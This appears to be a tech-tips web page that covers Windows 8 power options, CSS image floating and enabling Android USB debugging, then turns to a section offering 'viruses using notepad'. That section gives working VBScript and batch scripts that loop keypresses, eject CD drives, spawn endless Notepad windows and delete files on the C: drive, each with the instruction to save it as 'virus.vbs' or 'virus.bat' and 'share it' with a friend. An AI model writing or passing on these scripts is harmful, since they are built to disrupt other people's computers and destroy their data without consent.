By following simple steps you can add Sleep or Hibernate to your PC's Power Option Menu :
1. Open Control Panel > Power Options.
Or you can directly open Power Options by clicking on battery icon.
2. Now click on "Choose what the power buttons do" link given in left sidebar.
3. Then click on "Change settings that are currently unavailable" link given at the top and scroll down to bottom.
4. You'll notice that "Hibernate" or "Sleep" option is unchecked. Enable the option and apply the changes.
5. That's it. Now you can see missing hibernate or sleep option in power menu of Windows 8 as shown in following screenshot:
Float an Image to Left : (use any one)
1. Add a style attribute to the image, and apply the float property:
<img src="image-sample.jpg" alt="image-caption" style="float:left;" />
2. You can add some margins to the image to increase its readability:
<img src="image-sample.jpg" alt="image-caption" style="float:left;margin:0 5px 0 0;" />
3. With CSS float, an element can be pushed to the left, allowing other elements to wrap around it.
img
{
float: left;
}
Float an Image to Right : (use any one)
1. Add a style attribute to the image, and apply the float property:
<img src="image-sample.jpg" alt="image-caption" style="float:right;" />
2. You can add some margins to the image to increase its readability:
<img src="image-sample.jpg" alt="image-caption" style="float:right;margin:0 5px 0 0;" />
3. With CSS float, an element can be pushed to the right, allowing other elements to wrap around it.
img
{
float: right;
}
USB Debugging grants you a level of access to your device. This level of
access is important when you need system-level clearance, such as when
coding a new app.USB Debugging Mode is a mode that can be enabled in Android after
connecting the device directly to a computer with a USB cable. The
primary function of this mode is to facilitate a connection between an
Android device and a computer with Android SDK (software development
kit).
1. Android 2.0-2.3.x
Settings > Applications > Development > USB Debugging
2. Android 3.0- 4.1.x
Settings > Developer Options > USB Debugging
3. Android 4.2.x and higher.
- Go to "Settings".
- Scroll down to the bottom and tap "About phone" or "About tablet",
- Scroll down to the bottom of the "About phone" and locate the "Build Number" field.
- Tap the Build number field few times to enable Developer Options.
Tap a few times and you'll see a countdown that reads "You are now 3
steps away from being a developer."
- When you are done, you'll see the message "You are now a developer!".
- Tap the Back button and you'll see the Developer options menu under System on your Settings screen.
- Go to Settings>Developer Options>USB Debugging. Tap the USB Debugging checkbox.
4. Android 5.0 Lollipop
- Settings > About Phone > Build number > Tap it few times to become developer
- Settings > Developer Options > USB Debugging
NOTE: To disable USB Debugging and other developer options when you don't need them, slide the switch at the top of the screen from On to Off.
To enable USB Debugging on Android 5.0 Lollipop
1. Settings > About Phone > Build number > Tap it few times to become developer
2. Settings > Developer Options > USB Debugging.
To disable USB Debugging and other developer options when you don't need them, slide the switch at the top of the screen from On to Off.
I am providing easy codes that will make you viruses using notepad. This code based files can harm your computer so do not try these tricks on your own computer. Copy given code to Notepad and follow the given instructions.
1. Toggle your friend's Caps Lock, Num Lock, Scroll Lock buttons :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
Save this as "virus.vbs" and share it.
2. Frustrate somebody by making him/her hit Backspace again and again :
MsgBox "Please try to go back"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save this as "virus.vbs" and share it.
3. Ejecting your friend's CD Drive again n again :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save this as "virus.vbs" and share it.
4. Creating Virus That Format C Drive : (for Win XP)
@Echo off
Del C:\ *.* |y
Save this as "virus.bat" and share it.
5. Open Notepad continually in your friend's computer:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save this as "virus.bat" and share it.
Disclaimer
We shall not be liable for the improper or incomplete transmission of the information contained in this communication nor for any delay in its response or damage to your system. We do not guarantee that the integrity or security of this communication has been maintained or that this communication is free of viruses, interceptions or interferences. Anyone communicating with us by email accepts the risks involved and their consequences. We accept no liability for any damage caused by any virus transmitted by this site.